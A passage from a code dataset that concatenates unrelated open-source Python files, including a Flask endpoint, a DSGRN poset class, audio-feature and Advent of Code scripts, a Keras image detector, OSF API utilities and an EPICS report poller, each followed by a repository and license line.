# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
flag = json_data['flag'] if 'flag' in json_data else None
try:
nodeid = get_nodeid(self.statobjs, node)
except NotFound:
return {'data': []}
if flag:
pass # Placeholder to quiet pylint
macros = get_node_macros(self.statobj, nodeid)
return {'data': macros}
class DisplayEndpoints(Resource):
"""
Endpoint Display Resource Class for flask_restful
"""
def __init__(self, statobjs):
self.statobjs = statobjs
self.logger = logging.getLogger('esz.DisplayEndpoints')
def get(self):
"""GET method"""
return self.post()
def post(self):
"""POST method"""
node = None
self.logger.debug('request.data contents = {}'.format(request.data))
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
node = json_data['node'] if 'node' in json_data else None
results = {}
node = node if node else self.statobjs['health'].local_name
for api in APIS:
results[api] = get_endpoints(self.statobjs, api, node=node)[api]
self.logger.debug('RESULTS = {0}'.format(results))
return results
| untergeek/es_stats_zabbix | es_stats_zabbix/backend/discovery.py | Python | apache-2.0 | 5,177 |
# PosetOfExtrema.py
# MIT LICENSE
# Shaun Harker 2016-12-27
from DSGRN._dsgrn import *
class PosetOfExtrema(Pattern):
def __init__(self, network, events, orderings):
"""
Initializes a poset of extrema
network is a DSGRN network object
events is a list of tuples of the form (NAME,'min') or (NAME,'max') for NAME a name of a node in the network
orderings is list of event orderings (the code will perform transitive closure automatically), i.e.
a list of pairs (i,j) such that events[i] occurs before events[j]
"""
# Save variables
self.network_ = network
self.labels_ = [ event[0] + " " + event[1] for event in events]
# Construct Digraph from event and ordering data
digraph = Digraph()
for event in events:
digraph.add_vertex()
for edge in orderings:
digraph.add_edge(edge[0], edge[1])
self.poset_ = Poset(digraph)
# Find final occurrence of each variable in poset
latest_event = {}
label = {}
for i, event in enumerate(events):
variable = network.index(event[0])
if (variable not in latest_event) or self.poset_.compare(latest_event[variable], i):
latest_event[variable] = i
label[variable] = 2 ** (variable + network.size()) if event[1].lower() == "min" else 2 ** variable
final_label = 0
for variable in range(0,network.size()):
if variable not in latest_event:
                raise ValueError('Not every variable has an event; the current code requires at least one event per variable. TODO: generalize')
final_label += label[variable]
events_for_pattern = [network.index(event[0]) for event in events]
# Create "Pattern" object instance
super(PosetOfExtrema, self).__init__(self.poset_, events_for_pattern, final_label, self.network_.size())
def graphviz(self):
"""
Return graphviz string for visualization
"""
N = len(self.labels_)
gv_vertices = [ '"' + str(i) + '" [label="' + self.labels_[i] + '"];' for i in range(0,N) ]
gv_edges = [ '"' + str(u) + '" -> "' + str(v) + '";' for u in range(0,N) for v in self.poset_.children(u) ]
return 'digraph {\n' + '\n'.join(gv_vertices) + '\n' + '\n'.join(gv_edges) + '\n}\n'
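# Illustrative construction (the two-node network spec below is an assumption,
# not part of the original file):
#   network = Network("X : (~Y)\n" "Y : (X)")
#   events = [("X", "max"), ("Y", "max"), ("X", "min"), ("Y", "min")]
#   orderings = [(0, 1), (1, 2), (2, 3)]
#   print(PosetOfExtrema(network, events, orderings).graphviz())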
| shaunharker/DSGRN | src/DSGRN/Query/PosetOfExtrema.py | Python | mit | 2,236 |
import argparse
import mir3.data.feature_track as track
import mir3.data.spectrogram as spectrogram
import mir3.lib.mir.features as feats
import mir3.module
import copy
class LowEnergy(mir3.module.Module):
"""Calculate the Low Energy feature"""
def get_help(self):
return """Low energy feature for each texture window of a spectrogram"""
def build_arguments(self, parser):
parser.add_argument('-A','--texture-length', type=int, default=40, help="""size of texture window, in analysis windows (frames) (default: %(default)s)""")
parser.add_argument('infile', type=argparse.FileType('rb'),
help="""spectrogram file""")
parser.add_argument('outfile', type=argparse.FileType('wb'),
help="""output track file""")
def calc_track(self, spectrum, texture_length):
return self.calc_track_band(spectrum,
texture_length,
spectrum.freq_bin(spectrum.metadata.min_freq),
spectrum.freq_bin(spectrum.metadata.max_freq))
def calc_track_band(self, spectrum, texture_length, min_freq_bin, max_freq_bin):
t = track.FeatureTrack()
t.data = feats.low_energy(spectrum.data[min_freq_bin:max_freq_bin], texture_length)
t.metadata.sampling_configuration = spectrum.metadata.sampling_configuration
t.metadata.feature = "LowEnergy_" + str(min_freq_bin) + "_" +\
str(max_freq_bin)
t.metadata.filename = spectrum.metadata.input.name
t.metadata.input_metadata = copy.deepcopy(spectrum.metadata)
return t
def run(self, args):
s = spectrogram.Spectrogram().load(args.infile)
t = self.calc_track(s, args.texture_length)
#print s.data.shape
# t = track.FeatureTrack()
# t.data = feats.low_energy(s.data/s.metadata.sampling_configuration.dft_length, args.texture_length)
#
# t.metadata.sampling_configuration = s.metadata.sampling_configuration
# t.metadata.feature = "LowEnergy"
# t.metadata.filename = s.metadata.input.name
t.save(args.outfile)
| pymir3/pymir3 | mir3/modules/features/low_energy.py | Python | mit | 2,201 |
#!/usr/bin/env python3
"""
http://adventofcode.com/day/17
Part 1
------
The elves bought too much eggnog again - 150 liters this time. To
fit it all into your refrigerator, you'll need to move it into
smaller containers. You take an inventory of the capacities of
the available containers.
For example, suppose you have containers of size 20, 15, 10, 5,
and 5 liters. If you need to store 25 liters, there are four ways
to do it:
- 15 and 10
- 20 and 5 (the first 5)
- 20 and 5 (the second 5)
- 15, 5, and 5
Filling all containers entirely, how many different combinations
of containers can exactly fit all 150 liters of eggnog?
Part 2
------
While playing with all the containers in the kitchen, another load
of eggnog arrives! The shipping and receiving department is
requesting as many containers as you can spare.
Find the minimum number of containers that can exactly fit all
150 liters of eggnog. How many different ways can you fill that
number of containers and still hold exactly 150 litres?
In the example above, the minimum number of containers was two.
There were three ways to use that many containers, and so the
answer there would be 3.
"""
from __future__ import print_function, unicode_literals
from itertools import combinations
import os
import re
import sys
INFILE = 'inputs/input17.txt'
def main():
containers = list()
with open(INFILE) as f:
for line in f:
containers.append(int(line.strip()))
# Part 1
p1count = 0
    for s in range(1, len(containers) + 1):
for c in combinations(containers, s):
if sum(c) == 150:
p1count += 1
# Part 2
p2sizes = dict()
p2min = len(containers)
    for i in range(p2min + 1):
        p2sizes[i] = 0
    for s in range(1, len(containers) + 1):
for c in combinations(containers, s):
if sum(c) == 150:
if len(c) < p2min:
p2min = len(c)
p2sizes[s] += 1
msg = '[Python] Puzzle 17-1: {}'
print(msg.format(p1count))
msg = '[Python] Puzzle 17-2: {}'
print(msg.format(p2sizes[p2min]))
if __name__ == '__main__':
main()
| rnelson/adventofcode | advent2015/day17.py | Python | mit | 2,152 |
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.layers import Input, Dense, merge
from keras.applications.resnet50 import ResNet50
import numpy as np
class Detector(object):
def __init__(self, img_shape, n_dense):
'''Initializes the detector network:
-----------
img_shape: tuple
A tuple denoting the image shape that the network is trained on. Should be of the form (height,width,channels)
n_dense: int
        Number of units in the dense layers that are put on top of the pre-trained ResNet.
Returns:
--------
Initialized detector network.
'''
self.model = self.get_pre_resnet(img_shape, n_dense)
def get_pre_resnet(self, input_shape, n_dense):
'''Loads the pretrained Keras ResNet, adds 2 trainable dense layers and returns the compiled graph:
-----------
input_shape: tuple
A tuple denoting the image shape that the network is trained on. Should be of the form (height,width,channels)
n_dense: int
        Number of units in the dense layers that are put on top of the pre-trained ResNet.
Returns:
--------
Compiled detector network.
'''
base_model = ResNet50(include_top=False, weights='imagenet', input_tensor=None, input_shape=input_shape)
x = base_model.output
f_1 = Flatten()(x)
n1 = BatchNormalization()(f_1)
fc1 = Dense(n_dense)(n1)
r1 = Activation('relu')(fc1)
n2 = BatchNormalization()(r1)
fc2 = Dense(n_dense)(n2)
r2 = Activation('relu')(fc2)
n3 = BatchNormalization()(r2)
fc3 = Dense(2)(n3)
final = Activation('softmax')(fc3)
res_net = Model(input=base_model.input, output=final)
for layer in base_model.layers:
layer.trainable = False
res_net.compile(optimizer='adam', loss='categorical_crossentropy',
metrics=['accuracy'])
return res_net
def train_on_batch(self, X,Y):
'''Same method as in the Keras API:
-----------
X: np.array
Numpy array containing the training data of shape (n_samples, height, width, channels)
Y: np.array
Corresponding labels for the training data.
Returns:
--------
None
'''
self.model.train_on_batch(X.astype(np.float32), Y)
def predict(self, X):
'''Returns rounded predictions on the given data:
-----------
X: np.array
Numpy array containing the data of shape (n_samples, height, width, channels)
Returns:
--------
Prediction: np.array
Numpy array containing the predictions with either 1 or 0
'''
return np.round(self.model.predict(X)[:,1])
def save_weights(self, path):
'''Same method as in the Keras API:
-----------
path: str
Filename of the model to be saved
Returns:
--------
None
'''
self.model.save_weights(path)
def load_weights(self, path):
'''Same method as in the Keras API:
-----------
path: str
Filename of the model to be loaded
Returns:
--------
None
'''
self.model.load_weights(path)
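# Minimal usage sketch (illustrative; shapes, unit count, and data are
# assumptions, not from the original file):
#   det = Detector(img_shape=(224, 224, 3), n_dense=256)
#   det.train_on_batch(X_batch, Y_batch)  # Y_batch one-hot with shape (n, 2)
#   preds = det.predict(X_new)            # rounded 0/1 per sample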
| GodelBose/NSFW_Detection | detector.py | Python | mit | 3,477 |
#!/usr/bin/env python
from thug.DOM.JSClass import JSClass
class NodeList(JSClass):
def __init__(self, doc, nodes):
self.doc = doc
self.nodes = nodes
def __len__(self):
return self.length
def __getitem__(self, key):
return self.item(int(key))
def item(self, index):
from thug.DOM.W3C.DOMImplementation import DOMImplementation
        return DOMImplementation.createHTMLElement(self.doc, self.nodes[index]) if 0 <= index < len(self.nodes) else None
@property
def length(self):
return len(self.nodes)
| tweemeterjop/thug | thug/DOM/W3C/NodeList.py | Python | gpl-2.0 | 589 |
# -*- coding: utf-8 -*-
import urllib
import urlparse
import furl
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from rest_framework.exceptions import NotFound
from rest_framework.reverse import reverse
from api.base.authentication.drf import get_session_from_cookie
from api.base.exceptions import Gone, UserGone
from framework.auth import Auth
from framework.auth.cas import CasResponse
from framework.auth.oauth_scopes import ComposedScopes, normalize_scopes
from osf.models import OSFUser, Node, Registration
from osf.models.base import GuidMixin
from osf.modm_compat import to_django_query
from osf.utils.requests import check_select_for_update
from website import settings as website_settings
from website import util as website_util # noqa
# These values are copied from rest_framework.fields.BooleanField
# BooleanField cannot be imported here without raising an
# ImproperlyConfigured error
TRUTHY = set(('t', 'T', 'true', 'True', 'TRUE', '1', 1, True, 'on', 'ON', 'On', 'y', 'Y', 'YES', 'yes'))
FALSY = set(('f', 'F', 'false', 'False', 'FALSE', '0', 0, 0.0, False, 'off', 'OFF', 'Off', 'n', 'N', 'NO', 'no'))
UPDATE_METHODS = ['PUT', 'PATCH']
def decompose_field(field):
from api.base.serializers import (
HideIfWithdrawal, HideIfRegistration,
HideIfDisabled, AllowMissing
)
WRAPPER_FIELDS = (HideIfWithdrawal, HideIfRegistration, HideIfDisabled, AllowMissing)
while isinstance(field, WRAPPER_FIELDS):
try:
field = getattr(field, 'field')
except AttributeError:
break
return field
def is_bulk_request(request):
"""
Returns True if bulk request. Can be called as early as the parser.
"""
content_type = request.content_type
return 'ext=bulk' in content_type
def is_truthy(value):
return value in TRUTHY
def is_falsy(value):
return value in FALSY
def get_user_auth(request):
"""Given a Django request object, return an ``Auth`` object with the
authenticated user attached to it.
"""
user = request.user
private_key = request.query_params.get('view_only', None)
if user.is_anonymous:
auth = Auth(None, private_key=private_key)
else:
auth = Auth(user, private_key=private_key)
return auth
def absolute_reverse(view_name, query_kwargs=None, args=None, kwargs=None):
"""Like django's `reverse`, except returns an absolute URL. Also add query parameters."""
relative_url = reverse(view_name, kwargs=kwargs)
url = website_util.api_v2_url(relative_url, params=query_kwargs, base_prefix='')
return url
def get_object_or_error(model_cls, query_or_pk, request, display_name=None):
obj = query = None
select_for_update = check_select_for_update(request)
if isinstance(query_or_pk, basestring):
# they passed a 5-char guid as a string
if issubclass(model_cls, GuidMixin):
# if it's a subclass of GuidMixin we know it's primary_identifier_name
query = {'guids___id': query_or_pk}
else:
if hasattr(model_cls, 'primary_identifier_name'):
# primary_identifier_name gives us the natural key for the model
query = {model_cls.primary_identifier_name: query_or_pk}
else:
                # fall back to modmcompatibility's load method since we don't know their PIN
obj = model_cls.load(query_or_pk, select_for_update=select_for_update)
else:
# they passed a query
if hasattr(model_cls, 'primary_identifier_name'):
query = to_django_query(query_or_pk, model_cls=model_cls)
else:
# fall back to modmcompatibility's find_one
obj = model_cls.find_one(query_or_pk, select_for_update=select_for_update)
if not obj:
if not query:
# if we don't have a query or an object throw 404
raise NotFound
try:
# TODO This could be added onto with eager on the queryset and the embedded fields of the api
if isinstance(query, dict):
obj = model_cls.objects.get(**query) if not select_for_update else model_cls.objects.filter(**query).select_for_update().get()
else:
obj = model_cls.objects.get(query) if not select_for_update else model_cls.objects.filter(query).select_for_update().get()
except ObjectDoesNotExist:
raise NotFound
# For objects that have been disabled (is_active is False), return a 410.
# The User model is an exception because we still want to allow
# users who are unconfirmed or unregistered, but not users who have been
# disabled.
if model_cls is OSFUser and obj.is_disabled:
raise UserGone(user=obj)
elif model_cls is not OSFUser and not getattr(obj, 'is_active', True) or getattr(obj, 'is_deleted', False):
if display_name is None:
raise Gone
else:
raise Gone(detail='The requested {name} is no longer available.'.format(name=display_name))
return obj
def waterbutler_url_for(request_type, provider, path, node_id, token, obj_args=None, **query):
"""Reverse URL lookup for WaterButler routes
:param str request_type: data or metadata
:param str provider: The name of the requested provider
:param str path: The path of the requested file or folder
:param str node_id: The id of the node being accessed
:param str token: The cookie to be used or None
:param dict **query: Addition query parameters to be appended
"""
url = furl.furl(website_settings.WATERBUTLER_URL)
url.path.segments.append(request_type)
url.args.update({
'path': path,
'nid': node_id,
'provider': provider,
})
if token is not None:
url.args['cookie'] = token
    if obj_args and 'view_only' in obj_args:
url.args['view_only'] = obj_args['view_only']
url.args.update(query)
return url.url
def default_node_list_queryset():
return Node.objects.filter(is_deleted=False)
def default_node_permission_queryset(user):
if user.is_anonymous:
return Node.objects.filter(is_public=True)
return Node.objects.filter(Q(is_public=True) | Q(contributor__user_id=user.pk))
def default_registration_list_queryset():
return Registration.objects.filter(is_deleted=False)
def default_registration_permission_queryset(user):
if user.is_anonymous:
return Registration.objects.filter(is_public=True)
return Registration.objects.filter(Q(is_public=True) | Q(contributor__user_id=user.pk))
def extend_querystring_params(url, params):
scheme, netloc, path, query, _ = urlparse.urlsplit(url)
orig_params = urlparse.parse_qs(query)
orig_params.update(params)
query = urllib.urlencode(orig_params, True)
return urlparse.urlunsplit([scheme, netloc, path, query, ''])
def extend_querystring_if_key_exists(url, request, key):
if key in request.query_params.keys():
return extend_querystring_params(url, {key: request.query_params.get(key)})
return url
def has_admin_scope(request):
""" Helper function to determine if a request should be treated
as though it has the `osf.admin` scope. This includes both
tokened requests that do, and requests that are made via the
OSF (i.e. have an osf cookie)
"""
cookie = request.COOKIES.get(website_settings.COOKIE_NAME)
if cookie:
return bool(get_session_from_cookie(cookie))
token = request.auth
if token is None or not isinstance(token, CasResponse):
return False
return set(ComposedScopes.ADMIN_LEVEL).issubset(normalize_scopes(token.attributes['accessTokenScope']))
def is_deprecated(request_version, min_version, max_version):
    return request_version < min_version or request_version > max_version
| aaxelb/osf.io | api/base/utils.py | Python | apache-2.0 | 7,885 |
import supriya.commands
import supriya.realtime
from supriya.system.SupriyaValueObject import SupriyaValueObject
class NodeTransition(SupriyaValueObject):
"""
A non-realtime state transition.
"""
### CLASS VARIABLES ###
__documentation_section__ = "Session Internals"
__slots__ = ("_source", "_target", "_action")
### INITIALIZER ###
def __init__(self, source=None, action=None, target=None):
if action is not None:
action = supriya.AddAction.from_expr(action)
assert isinstance(action, supriya.AddAction)
assert source is not target
if action is None:
assert source is not None
assert target is None
self._action = action
self._source = source
self._target = target
### PRIVATE METHODS ###
def _free_node(self, nodes_to_children, nodes_to_parents):
node = self.source
for child in nodes_to_children.get(node, ()) or ():
self.free_node(child, nodes_to_children, nodes_to_parents)
parent = nodes_to_parents.get(node, None)
if node in nodes_to_children:
del nodes_to_children[node]
if node in nodes_to_parents:
del nodes_to_parents[node]
if not parent:
return
children = list(nodes_to_children[parent])
children.remove(node)
nodes_to_children[parent] = tuple(children) or None
def _move_node(self, nodes_to_children, nodes_to_parents):
assert self.target in nodes_to_children
if self.source not in nodes_to_children:
nodes_to_children[self.source] = None
old_parent = nodes_to_parents.get(self.source, None)
if old_parent:
children = list(nodes_to_children[old_parent])
children.remove(self.source)
nodes_to_children[old_parent] = tuple(children) or None
if self.action in (supriya.AddAction.ADD_AFTER, supriya.AddAction.ADD_BEFORE):
new_parent = nodes_to_parents[self.target]
else:
new_parent = self.target
nodes_to_parents[self.source] = new_parent
children = list(nodes_to_children.get(new_parent, None) or ())
if self.action == supriya.AddAction.ADD_TO_HEAD:
children.insert(0, self.source)
elif self.action == supriya.AddAction.ADD_TO_TAIL:
children.append(self.source)
elif self.action == supriya.AddAction.ADD_BEFORE:
index = children.index(self.target)
children.insert(index, self.source)
elif self.action == supriya.AddAction.ADD_AFTER:
index = children.index(self.target) + 1
children.insert(index, self.source)
nodes_to_children[new_parent] = tuple(children) or None
def _to_request(self, id_mapping):
node_id_pair = (id_mapping[self.source], id_mapping[self.target])
if self.action == supriya.AddAction.ADD_TO_HEAD:
request_class = supriya.commands.GroupHeadRequest
elif self.action == supriya.AddAction.ADD_TO_TAIL:
request_class = supriya.commands.GroupTailRequest
elif self.action == supriya.AddAction.ADD_BEFORE:
request_class = supriya.commands.NodeBeforeRequest
elif self.action == supriya.AddAction.ADD_AFTER:
request_class = supriya.commands.NodeAfterRequest
request = request_class(node_id_pairs=[node_id_pair])
return request
### PUBLIC METHODS ###
def apply_transform(self, nodes_to_children, nodes_to_parents):
if self.action is None:
self._free_node(nodes_to_children, nodes_to_parents)
else:
self._move_node(nodes_to_children, nodes_to_parents)
@classmethod
def free_node(cls, node, nodes_to_children, nodes_to_parents):
action = cls(source=node)
action.apply_transform(nodes_to_children, nodes_to_parents)
### PUBLIC PROPERTIES ###
@property
def action(self):
return self._action
@property
def source(self):
return self._source
@property
def target(self):
return self._target
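# Illustrative transform (an assumption, not part of the original file):
# moving ``node`` to the head of ``group`` rewires both lookup tables in place:
#   NodeTransition(source=node, action='ADD_TO_HEAD', target=group) \
#       .apply_transform(nodes_to_children, nodes_to_parents)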
| Pulgama/supriya | supriya/nonrealtime/NodeTransition.py | Python | mit | 4,163 |
"""
Copyright 2016 (c) Rakshak Talwar
Released under the Apache 2 License
"""
import json, pdb, re, time
import HTMLParser
import sqlite3 as sql
import requests
import gspread
from oauth2client.client import SignedJwtAssertionCredentials
### global variables ###
hparse = HTMLParser.HTMLParser()
### gather authentication information ###
auth_file_location = 'auth_info.txt'
auth_ls = []
with open(auth_file_location, 'r') as auth_file:
    auth_ls = [item.strip() for item in auth_file.readlines()]
# define global variables for authentication
F6S_KEY = auth_ls[0]
class F6S():
"""Defines object to pull data from F6S API"""
def __init__(self):
self.api_key = F6S_KEY
self.request_url = 'https://api.f6s.com/hatchpitchsxsw2016/applications'
# define the field names for the json responses and sql table, field names correspond 1 to 1
self.sql_fields = [
"StartedOn",
"SubmittedOn",
"CompanyTeam",
"City",
"Country",
"IndustrySector",
"ContactFirstName",
"ContactLastName",
"ContactEmail",
"ContactPhone",
"Employees",
"FoundersandExecs",
"InvestorsEquity",
"ProductLaunch",
"Grapevine",
"Accelerators",
"Pitching",
"Availability",
"Agreement",
"AppStatus"
]
self.json_fields = [
"date_created",
"date_finalized",
"name",
["location", "city"],
["location", "country"],
["questions", 0, "field_response", '*'],
["questions", 4, "question_response"],
["questions", 5, "question_response"],
["questions", 6, "question_response"],
["questions", 7, "question_response"],
["questions", 3, "question_response"],
["members", '*', "name"],
["questions", 2, "question_response"],
["questions", 1, "field_response"],
["questions", 8, "question_response"],
["questions", 9, "question_response"],
["questions", 10, "question_response"],
["questions", 11, "field_response", '*'],
["questions", 12, "field_response", '*'],
"status"
]
def grab_data(self):
"""Pulls all relevant data from F6S REST API. Returns a dict
with fields: data and fields (see save method under DBHandler class)"""
self.all_data = [] # list stores JSON objects of all companies' data
page = 1
while page:
# pull JSON object
payload = {'page' : page, 'api_key' : self.api_key}
r = requests.get(self.request_url, params=payload)
j = r.json() # create JSON object from response
# extend all_data with data in this json response if the data exists
if 'data' in j: # check to see if data is present in most recent request
self.all_data.extend(j['data'])
page += 1 # increment page variable to pick up new data on next run
time.sleep(0.02) # wait for a bit before submitting next request
else: # if no data exists, exit this loop
page = False
return {'data' : self._piece_extractor(self.all_data), 'fields' : self.sql_fields}
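    # The dict returned above matches what DBHandler.save expects: 'data' is a
    # list of per-company dicts keyed by self.sql_fields, and 'fields' is that
    # same key list.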
def _piece_extractor(self, j_objects):
"""Extracts the SQL tables corresponding piece of information from a
dict representing a single company. Returns a list of dicts
where the field names correspond with the needed field names for the SQL table"""
self.cleaned_objs = [] # a list of cleaned JSON objects to be returned
# go through each object from the F6S API calls and create semi-copies with relevant and corresponding fields
for j_object in j_objects:
# create a temporary object, will be appended to the cleaned_objs list
temp_obj = {}
# fill up the temp_obj with the relevant information
for index, sql_field in enumerate(self.sql_fields):
# handle the different types of nested data sequences
if isinstance(self.json_fields[index], str): # if the field is directly present, no nesting
temp_obj[sql_field] = j_object[self.json_fields[index]]
elif isinstance(self.json_fields[index], list): # handles nested cases
nest_list = self.json_fields[index] # for brevity's sake
if len(nest_list) == 2:
temp_obj[sql_field] = j_object[nest_list[0]][nest_list[1]]
elif len(nest_list) == 3:
                    # note there are two types of nest_list of length 3, we need to handle them separately
if isinstance(nest_list[1], int): # the first type is where item at index 1 is an integer
temp_obj[sql_field] = hparse.unescape(j_object[nest_list[0]][nest_list[1]][nest_list[2]])
elif nest_list[1] == '*': # the second type is where item at index 1 is an asterisk (*)
# in this case we need to cycle through the list given after we pull it from j_object.
# then we join all of the values given in the field from nest_list[2]
                            str_to_return = ', '.join(item[nest_list[2]] for item in j_object[nest_list[0]])
temp_obj[sql_field] = str_to_return.encode('ascii', 'ignore')
elif len(nest_list) == 4:
                        str_to_return = ''
                        nested_val = j_object[nest_list[0]][nest_list[1]][nest_list[2]]  # for brevity's sake
                        if isinstance(nested_val, list):
                            # join every item, avoiding the stray separators plain concatenation leaves behind
                            str_to_return = ', '.join(nested_val)
                        elif isinstance(nested_val, str):
                            str_to_return = nested_val.encode('ascii', 'ignore')
temp_obj[sql_field] = str_to_return
# add the cleaned object
self.cleaned_objs.append(temp_obj)
return self.cleaned_objs
class GS():
"""Defines object to pull data from gspread API"""
def __init__(self):
# initialize the client which will communicate with the Google Spreadsheet
json_key = json.load(open('client_secret.json'))
scope = ['https://spreadsheets.google.com/feeds']
credentials = SignedJwtAssertionCredentials(json_key['client_email'], json_key['private_key'], scope)
self.client = gspread.authorize(credentials)
# define the field names for the sql table
self.sql_fields = [
"SubmittedOn",
"Company",
"ShortDescription",
"City",
"StateProvince",
"Country",
"IndustrySector",
"CompanyWebsite",
"CompanySocial",
"ContactFirstName",
"ContactLastName",
"ContactEmail",
"ContactPhone",
"Employees",
"FoundersandExecs",
"Revenue",
"CurrentInvestment",
"Investors",
"Funding",
"Launch",
"Grapevine",
"Accelerators",
"Pitching",
"Availability",
"Agreement"
]
def grab_data(self, spreadsheet_key='1TgYK4D209oPrmv18-XVodH40JjvU69Xhkfjau3DlQxg', worksheet_name='Sheet1'):
# open the respective worksheet within the Google Spreadsheet
self.spreadsheet = self.client.open_by_key(spreadsheet_key)
self.worksheet = self.spreadsheet.worksheet(worksheet_name)
# grab all data present within the worksheet, not including headers
all_data = self.worksheet.get_all_values()[1:]
return {'data' : all_data, 'fields' : self.sql_fields}
class DBHandler():
"""Defines object which handles saving data into the sqlite db"""
def __init__(self, db_path='db/HATCHscreening.db'):
# create connection to sqlite database to make cursor object
self.db_path = db_path
self.connection = sql.connect(self.db_path)
self.cursor = self.connection.cursor()
def save(self, table_name, doc):
"""Saves a dict with fields: [data, fields]
Where data is a list of dicts, and fields is a list of fields which corresponds
with the field names in the respective table"""
try:
# create a new connection to sqlite database to make cursor object
self.connection = sql.connect(self.db_path)
self.cursor = self.connection.cursor()
if table_name == 'F_Application':
self.cursor.executescript("""
DROP TABLE IF EXISTS {0};
CREATE TABLE {0}(StartedOn DateTime,
SubmittedOn DateTime,
CompanyTeam TEXT,
City TEXT,
Country TEXT,
IndustrySector TEXT,
ContactFirstName TEXT,
ContactLastName TEXT,
ContactEmail TEXT,
ContactPhone TEXT,
Employees INTEGER,
FoundersandExecs TEXT,
InvestorsEquity TEXT,
ProductLaunch TEXT,
Grapevine TEXT,
Accelerators TEXT,
Pitching TEXT,
Availability TEXT,
Agreement TEXT,
AppStatus TEXT);
""".format(table_name))
self._complete_all_insertions(table_name, doc)
elif table_name == 'H_Application':
self.cursor.executescript("""
DROP TABLE IF EXISTS {0};
CREATE TABLE {0}(SubmittedOn DateTime,
Company Text,
ShortDescription Text,
City Text,
StateProvince Text,
Country Text,
IndustrySector Text,
CompanyWebsite Text,
CompanySocial Text,
ContactFirstName Text,
ContactLastName Text,
ContactEmail Text,
ContactPhone Text,
Employees INTEGER DEFAULT 0,
FoundersandExecs Text,
Revenue REAL,
CurrentInvestment REAL DEFAULT 0,
Investors Text,
Funding Text,
Launch DateTime,
Grapevine Text,
Accelerators Text,
Pitching Text,
Availability Text,
Agreement Text);
""".format(table_name))
self._complete_all_insertions(table_name, doc)
self.connection.commit()
except Exception as e:
if self.connection:
self.connection.rollback()
raise e
finally:
if self.connection:
self.connection.close()
def _complete_all_insertions(self, table_name, doc):
"""Returns a list with all insertion commands to be used
Accepts the data returned by grab_data method"""
# fill the insertion_string with contents
for item in doc['data']:
vals = []
if table_name == 'F_Application':
for key in doc['fields']:
vals.append(item[key])
elif table_name == 'H_Application':
vals.extend(item)
placeholders = "({0})".format(len(vals) * '?, ') # generate SQL friendly placeholders string
placeholders = placeholders[:-3] + ')' # remove the trailing comma
sql_command = "INSERT INTO {0} VALUES {1}".format(table_name, placeholders)
self.cursor.execute(sql_command, vals) # interpolate values into SQL command
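# ---------------------------------------------------------------------------
# Minimal usage sketch (editor's addition, not part of the original module).
# It wires the three classes above together; the table names come from
# DBHandler.save(), everything else is illustrative only.
if __name__ == '__main__':
    handler = DBHandler()
    handler.save('F_Application', F6S().grab_data())  # F6S REST API -> sqlite
    handler.save('H_Application', GS().grab_data())   # Google Sheet -> sqlite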
|
RakshakTalwar/hatchpitchpull
|
hatchpitchpull/hatchpitchpull.py
|
Python
|
apache-2.0
| 12,244
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2018 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
import json
from inspirehep.modules.records.serializers.schemas.json.literature.common import DOISchemaV1
from marshmallow import Schema, fields
def test_returns_value_and_material_for_doi():
schema = DOISchemaV1()
dump = {
'source': 'arXiv',
'value': '10.1016/j.nuclphysb.2017.05.003',
'material': 'publication',
}
expected = {
'value': '10.1016/j.nuclphysb.2017.05.003',
'material': 'publication',
}
result = schema.dumps(dump).data
assert expected == json.loads(result)
def test_same_doi_value_from_different_source_is_ignored():
class TestSchema(Schema):
dois = fields.Nested(
DOISchemaV1, dump_only=True, many=True)
schema = TestSchema()
dump = {
'dois': [
{
'value': '10.1016/j.nuclphysb.2017.05.003'
},
{
'value': '10.1016/j.nuclphysb.2017.05.003',
},
{
'value': '10.1093/mnras/sty2213',
},
],
}
expected = {
'dois': [
{
'value': '10.1016/j.nuclphysb.2017.05.003'
},
{
'value': '10.1093/mnras/sty2213',
},
],
}
result = schema.dumps(dump).data
assert expected == json.loads(result)
|
inspirehep/inspire-next
|
tests/unit/records/serializers/literature/common/test_doi.py
|
Python
|
gpl-3.0
| 2,323
|
# -*- coding: utf-8 -*-
import time, sched, urllib2, json
from devsup.db import IOScanListBlock
from devsup.hooks import initHook
from devsup.util import StoppableThread
class BPLReport(object):
reports = {}
def __init__(self, name, url, period):
self.name = name
self.url, self.period = url, period
self.result = None
self.reports[name] = self
self.scan = IOScanListBlock()
def fail(self):
self.result = None
def process(self):
self.result = None
R = urllib2.urlopen(self.url, timeout=3)
try:
if R.getcode()!=200:
print 'Fail',R.getcode(), self.url
self.result = None
return
self.result = json.load(R)
except:
print 'Error fetching',self.url
import traceback
traceback.print_exc()
finally:
R.close()
self.result_time = time.time()
self.scan.interrupt(reason = self.result)
add = BPLReport
class ReportRunner(StoppableThread):
class _Done(Exception):
pass
def _sleep(self, time):
if not self.sleep(time):
raise self._Done()
def _proc(self, R):
self._S.enter(R.period, 0, self._proc, (R,))
try:
R.process()
except:
print 'Error in processing',R.url
import traceback
traceback.print_exc()
R.fail()
def run(self):
self._S = S = sched.scheduler(time.time, self._sleep)
for R in BPLReport.reports.itervalues():
S.enter(0, 0, self._proc, (R,))
try:
S.run()
except self._Done:
print 'BPL worker exit'
except:
print 'Error in scheduler'
import traceback
traceback.print_exc()
_worker = ReportRunner()
@initHook("AfterIocRunning")
def _startWorker():
_worker.start()
print 'BPL worker started'
@initHook("AtIocExit")
def _stopWorker():
print 'BPL worker stopping'
_worker.join()
print 'BPL worker stopped'
class ReportItem(object):
raw = True
def __init__(self, rec, args):
# "<operation> <report>.<index>.<attribute> "
opname, src = args.split(None,2)[:2]
